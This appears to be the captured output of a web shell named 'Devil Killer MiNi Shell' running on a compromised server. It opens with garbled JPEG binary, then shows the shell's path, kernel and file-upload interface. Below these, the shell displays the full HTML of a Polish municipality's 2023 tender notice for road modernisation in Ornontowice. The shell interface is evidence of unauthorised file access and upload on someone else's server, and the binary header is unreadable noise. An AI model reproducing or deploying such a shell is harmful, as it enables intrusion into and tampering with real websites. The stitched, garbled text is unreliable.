JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230308/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230308/0012695701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja dróg gminnych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Ornontowice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276257759</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Zwycięstwa 26a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ornontowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">43-178</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22C - Tyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@ornontowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.ornontowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja dróg gminnych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ed9c6283-bdc1-11ed-8261-62cbbe4d0ca4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00126957</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00015880/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Modernizacja dróg gminnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://e-zp.ornontowice.pl/procurements/91/procurement <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://e-zp.ornontowice.pl/procurements/91/procurement</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Systemu E-Zamówienia Publiczne Gminy Ornontowice (zwanego<br/>w niniejszej SWZ „Systemem E-ZP”) dostępnego pod adresem: https://e-zp.ornontowice.pl oraz przy użyciu poczty elektronicznej zp@ornontowice.pl. <br/>Szczegóły opisano w rozdziale VIII SWZ. Ofertę, oświadczenie, o których mowa w art. 125 ust. 1 ustawy Pzp należy złożyć pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. Szczegóły opisano w rozdziale VI SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Opisano w Rozdziale I SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Opisano w Rozdziale I SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZWRZP.271.00011.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie dofinansowane z Rządowego Funduszu Polski Ład: Programu Inwestycji Strategicznych.<br/>1.1. Zakres zadania przewidziany do realizacji w ramach zamówienia podstawowego obejmuje:<br/>Etap I – „Przebudowa ulicy Okrężnej oraz budowa parkingu wraz z odwodnieniem”<br/>Przebudowa odcinka ul. Okrężnej od zjazdu z ul. Zwycięstwa do wjazdu na teren boiska.<br/>Poszerzenie ul. Okrężnej (wykonanie poszerzenia istniejącej nawierzchni asfaltowej o szerokości ok. 3m do szerokości jezdni 5m) : <br/>- frezowanie istniejących warstw asfaltowych, uzupełnienie istniejącej podbudowy,<br/>- zabudowa krawężników na ławie betonowej – droga, <br/>- korytowanie, uzupełnienie istniejącej podbudowy i wykonanie nowej podbudowy na poszerzeniu<br/> ul. Okrężnej,<br/>- wykonanie warstwy 4cm wiążącej z betonu asfaltowego,<br/>- wykonanie warstwy 4cm ścieralnej z betonu asfaltowego,<br/>- niwelacja i utwardzenie wjazdów do posesji betonem asfaltowym,<br/>- wyrównanie tłuczniem i obsianie trawą terenów przyległych.<br/>Parking (10 miejsc parkingowych, w tym jedno dla niepełnosprawnych)<br/>- korytowanie,<br/>- ułożenie krawężników na ławie betonowej,<br/>- wykonanie podbudowy z kruszywa kamiennego<br/>- wykonanie nawierzchni z kostki betonowej grubości 8cm,<br/>- wyrównanie i obsianie trawą terenów przyległych,<br/>- oznakowanie miejsc dla niepełnosprawnych i wymalowanie farbą koloru niebieskiego do nawierzchni betonowych (należy wykonać projekt organizacji ruchu wraz z zatwierdzeniem),<br/>Na działce nr 2226/33 na odcinku od zjazdu z ul. Okrężnej - budowa parkingu na 10 miejsc postojowych w tym jedno dla niepełnosprawnych (należy wykonać projekt organizacji ruchu wraz z zatwierdzeniem), ulokowanych prostopadle do osi działki 2226/33. Wzdłuż parkingu ma zostać usytuowana nowa droga dojazdowa i manewrowa o szer. 5m. Jezdnia dojazdowa obustronnie ograniczona krawężnikiem najazdowym na ławie betonowej, jezdnia manewrowa ograniczona z jednej strony krawężnikiem najazdowym na ławie, z drugiej strony połączona ma zostać z miejscami parkingowymi. <br/>Nawierzchnie: drogi oraz parkingu na działce 2226/33 należy wykonać z kostki betonowej. Odwodnienie nawierzchni włączyć do projektowanej kanalizacji deszczowej w ul. Okrężnej.<br/>Kanalizacja deszczowa:<br/>- wytyczenie geodezyjnie tras zaprojektowanej kanalizacji,<br/>- wykopy pod zaprojektowane urządzenie kanalizacyjne,<br/>- zabudowa studni kanalizacyjnych DN1000,<br/>- zabudowa wpustów ulicznych DN500,<br/>- ułożenie przewodów kanalizacyjnych DN250 na podsypce piaskowej,<br/>- ułożenie przewodów kanalizacyjnych DN200 na podsypce piaskowej,<br/>- wykonanie zasypki i ułożenie taśmy ostrzegawczej,<br/>- inwentaryzacja geodezyjna,<br/>- zasypanie warstwami z zagęszczeniem i ułożeniem taśmy lokalizacyjnej koloru brazowego.<br/>Wykonanie odwodnienia nawierzchni poprzez zaprojektowane wpusty uliczne włączane do zaprojektowanej kanalizacji deszczowej. <br/>Wybudowaną kanalizację deszczową włączyć do istniejącej studni kanalizacji deszczowej w ul. Okrężnej.<br/>Etap II - „Przebudowa sięgacza drogi gminnej ulicy Tartacznej w Ornontowicach”<br/>Budowa sieci oświetleniowej:<br/>- budowa kablowej sieci oświetleniowej o długości 326 m, składającej się z dziesięciu latarni na słupach aluminiowych o wysokości 5m, z ledowymi źródłami światła w pasie drogowym ulicy Tartacznej,<br/>- wybudowany odcinek sieci oświetleniowej zostanie włączony do istniejącej sieci oświetleniowej ulicy Tartacznej (usytuowany na słupie przy budynku o numerze 4)<br/>- oprawa oświetleniowa LED o mocy 36W z neutralną barwą światła 3500K- 4000K, strumień świetlny źródeł światła : 4300lm,<br/>- słup oświetleniowy aluminiowy w kolorze czarnym o wysokości 5m,<br/>- wybudowaną sieć należy zasilić trzema fazami.<br/>Budowa przykanalików do wpustów kanalizacji deszczowej:<br/>- budowa studni wpustowych i włączenie ich do istniejących studni rewizyjnych za pomocą przykanalików.<br/>Budowa nawierzchni jezdni głównej i zjazdów.<br/>- budowa jezdni na szerokości 3,5 m dla ciągu głównego na odcinku 98,71 m wraz z odcinkiem dojazdu<br/>do posesji o nr ew. dz. 2707/200,<br/>- odcinek główny ograniczy od strony zachodniej krawężnikiem betonowym najazdowym osadzonym<br/>na ławie betonowej, po stronie przeciwnej zabudować obrzeże betonowe na ławie z betonu,<br/>- nawierzchnia jezdni z kostki betonowej 8cm w kolorze szarym, podbudowa z kruszywa łamanego, podsypka,<br/>- nawierzchnia zjazdów do posesji, dojść pieszych do posesji w granicach pasa drogowego oraz wyspy<br/>z kostki betonowej 8cm w kolorze grafitowym, podbudowa z kruszywa łamanego, podsypka.<br/>- w rejonie wyspy zastosować oznakowanie ostrzegawcze,<br/>Etap III - Remont cząstkowy nawierzchni: „Modernizacja dróg gminnych” <br/>a) ul. Marzankowice od nr 29 do nr 44 na długości 180 mb (wykonanie podbudowy z kruszywa, nawierzchnia górna kruszywo, dostosowanie istniejących wjazdów),<br/>b) ul. Polna - wzdłuż nr 29 na długości 70 mb (frezowanie nawierzchni bitumicznej, wykonanie nawierzchni<br/>z warstwy bitumiczno - asfaltowej, pobocze utwardzone z nawierzchnią z frezu, dostosowanie istniejących wjazdów),<br/>c) ul. Nowa od oczyszczalni do nr 3 na długości 200 mb (frezowanie nawierzchni bitumicznej, wykonanie nawierzchni z warstwy bitumiczno - asfaltowej, ułożenie krawężników na ławie betonowej, pobocze utwardzone z nawierzchnią z frezu, dostosowanie istniejących wjazdów),<br/>d) ul. Polna – próg zwalniający z kostki 3m x 6 m w ilości 2 szt. (wykonanie projektu organizacji ruchu drogowego, zatwierdzenie go przez Powiatowy Zarząd Dróg, budowa progów wraz z oznakowaniem poziomym i pionowym),<br/>e) ul. Nowa – próg wyspowy w ilości 2 szt. (budowa wraz z oznakowaniem poziomym i pionowym). <br/>1.2. Zakres zadania przewidziany do realizacji w ramach zamówienia zgodnie z prawem opcji obejmuje:<br/>Etap IV - ul. Graniczna - nowy dojazd do posesji nr 7-9 na odcinku ok. 220 m (wykonanie podbudowy z kruszywa, nawierzchnia górna – kruszywo, dostosowanie istniejących wjazdów),<br/>Etap V - ul. Polna - wzdłuż nr 12 - 16 b na odcinku ok. 160 m (frezowanie nawierzchni bitumicznej, wykonanie nawierzchni z warstwy bitumiczno - asfaltowej, pobocze utwardzone<br/>z nawierzchnią z frezu, dostosowanie istniejących wjazdów, regulacja wysokościowa istniejących urządzeń obcych),<br/>Etap VI - ul. Grabowa wzdłuż nr 4a – 4c na odcinku ok. 75 m (frezowanie nawierzchni bitumicznej, wykonanie nawierzchni z warstwy bitumiczno – asfaltowej),<br/>Etap VII - droga dojazdowa za budynkiem ARTerii Centrum Kultury i Promocji w Ornontowicach oraz dodatkowe miejsca postojowe na odcinku ok. 50 m (podbudowa z kruszywa, wykonanie nawierzchni z kostki betonowej o grubości 8cm, ułożenie krawężników na ławie betonowej, dodatkowe miejsca parkingowe, zabudowa barierki U12). <br/>Wartość zamówienia opcjonalnego (suma etapów: IV, V, VI, VII) nie może przekroczyć łącznie 30% wartości zamówienia podstawowego.<br/>Zamawiający zastrzega, iż wykonanie zamówienia w ramach prawa opcji jest uprawnieniem, a nie zobowiązaniem Zamawiającego. Zamawiający może nie skorzystać z prawa opcji, skorzystać z niego w mniejszym zakresie (wybór jednego lub kilku z etapów w ramach prawa opcji: IV-VII) niż został określony w Opisie przedmiotu zamówienia pkt 2, a Wykonawcy nie przysługują z tego tytułu żadne roszczenia. Warunkiem udzielenia zamówienia opcjonalnego jest posiadanie przez Zamawiającego środków finansowych. Zamawiający podejmie decyzję o skorzystaniu z prawa opcji i określi jego zakres do dnia zawarcia umowy z Wykonawcą. <br/>Szczegółowy opis przedmiotu zamówienia stanowi Załącznik nr 4 do SWZ– Opis przedmiotu zamówienia, STWiOR, przedmiar i obmiar robót. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233141-9 - Roboty w zakresie konserwacji dróg</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45233161-5 - Roboty budowlane w zakresie ścieżek pieszych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zakres zadania przewidziany do realizacji w ramach zamówienia zgodnie z prawem opcji obejmuje:<br/>Etap IV - ul. Graniczna - nowy dojazd do posesji nr 7-9 na odcinku ok. 220 m (wykonanie podbudowy z kruszywa, nawierzchnia górna – kruszywo, dostosowanie istniejących wjazdów),<br/>Etap V - ul. Polna - wzdłuż nr 12 - 16 b na odcinku ok. 160 m (frezowanie nawierzchni bitumicznej, wykonanie nawierzchni z warstwy bitumiczno - asfaltowej, pobocze utwardzone<br/>z nawierzchnią z frezu, dostosowanie istniejących wjazdów, regulacja wysokościowa istniejących urządzeń obcych),<br/>Etap VI - ul. Grabowa wzdłuż nr 4a – 4c na odcinku ok. 75 m (frezowanie nawierzchni bitumicznej, wykonanie nawierzchni z warstwy bitumiczno – asfaltowej),<br/>Etap VII - droga dojazdowa za budynkiem ARTerii Centrum Kultury i Promocji w Ornontowicach oraz dodatkowe miejsca postojowe na odcinku ok. 50 m (podbudowa z kruszywa, wykonanie nawierzchni z kostki betonowej o grubości 8cm, ułożenie krawężników na ławie betonowej, dodatkowe miejsca parkingowe, zabudowa barierki U12). <br/>Wartość zamówienia opcjonalnego (suma etapów: IV, V, VI, VII) nie może przekroczyć łącznie 30% wartości zamówienia podstawowego.<br/>Zamawiający zastrzega, iż wykonanie zamówienia w ramach prawa opcji jest uprawnieniem, a nie zobowiązaniem Zamawiającego. Zamawiający może nie skorzystać z prawa opcji, skorzystać z niego w mniejszym zakresie (wybór jednego lub kilku z etapów w ramach prawa opcji: IV-VII) niż został określony w Opisie przedmiotu zamówienia pkt 2, a Wykonawcy nie przysługują z tego tytułu żadne roszczenia. Warunkiem udzielenia zamówienia opcjonalnego jest posiadanie przez Zamawiającego środków finansowych. Zamawiający podejmie decyzję o skorzystaniu z prawa opcji i określi jego zakres do dnia zawarcia umowy z Wykonawcą. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">210 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. W trakcie oceny ofert Zamawiający może żądać udzielania przez Wykonawców wyjaśnień dotyczących treści złożonej oferty.<br/>2. Zamawiający poprawi w ofertach omyłki zgodnie z art. 223 ust. 2 ustawy Pzp.<br/>3. Przy wyborze oferty najkorzystniejszej, Zamawiający będzie się kierował następującymi kryteriami:<br/>a) cena ofertowa – 60 %<br/>b) okres gwarancji i rękojmi – 40 %.<br/>Szczegóły opisano w rozdziale XII SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Informacje o warunkach udziału w postępowaniu<br/>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/> 1.1 Nie podlegają wykluczeniu;<br/> 1.2 Spełniają warunki udziału w postępowaniu zgodnie z art. 112 „ustawy pzp”: <br/>1) W zakresie zdolności do występowania w obrocie gospodarczym.<br/>Zamawiający nie stawia warunku w ww. zakresie. <br/> 2) W zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej,<br/>o ile wynika to z odrębnych przepisów.<br/> Zamawiający nie stawia warunku w ww. zakresie.<br/> 3) W zakresie sytuacji ekonomicznej i finansowej:<br/> 1. dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej<br/>w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez Zamawiającego – 200 000,00 zł (Załącznik nr 5)<br/> 4) W zakresie zdolności technicznej lub zawodowej: <br/> a) Zamawiający uzna, że Wykonawca spełnia warunek w zakresie zdolności technicznej<br/>lub zawodowej, jeżeli Wykonawca wykaże, że:<br/>- wykonał należycie w okresie ostatnich 5 lat minimum 1 robotę budowlaną polegającą <br/>na budowie lub rozbudowie lub przebudowie lub remoncie drogi o nawierzchni bitumicznej o wartości nie mniejszej niż 400 000,00 zł brutto.<br/>b) Wykonawca skieruje do realizacji zamówienia:<br/>- minimum 1 osobę posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane (Dz. U. z 2021 r., poz. 2351, ze zmianami) i Rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019 r., poz. 831) lub im odpowiadające, ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. Osoba ta będzie pełnić funkcję Kierownika budowy.<br/>c) minimum 1 osobę – posiadającą uprawnienia budowlane do kierowania robotami w specjalności instalacji w zakresie sieci instalacji urządzeń elektrycznych zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane (Dz. U. z 2021 r., poz. 2351 ze zmianami) lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów. Osoba ta będzie pełnić funkcję Kierownika robót.<br/>U Wykonawców zagranicznych, dopuszcza się równoważne kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane,<br/>z uwzględnieniem postanowień ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2021 poz. 1646, ze zmianami). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. OŚWIADCZENIA I DOKUMENTY SKŁADANE WRAZ Z OFERTĄ<br/>1.1. Oferta składana jest pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub elektronicznym podpisem osobistym. Ofertę należy sporządzić zgodnie ze wzorem stanowiącym Załącznik nr 1 do SWZ.<br/>1.2. Wykonawca dołącza do oferty oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu w zakresie wskazanym w rozdziale IV SWZ. Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu, na dzień składania ofert, tymczasowo zastępujący wymagane podmiotowe środki dowodowe, wskazane w rozdziale V sekcja 2 ust. 2.1 SWZ. Oświadczenie należy złożyć zgodnie ze wzorem stanowiącym załącznik nr 2 do SWZ.<br/>1.3. Oświadczenie, o którym mowa w ust. 1.2 składają odrębnie:<br/>1) Wykonawca/każdy spośród Wykonawców Wspólnie ubiegających się o udzielenie zamówienia.<br/>W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia Wykonawcy oraz 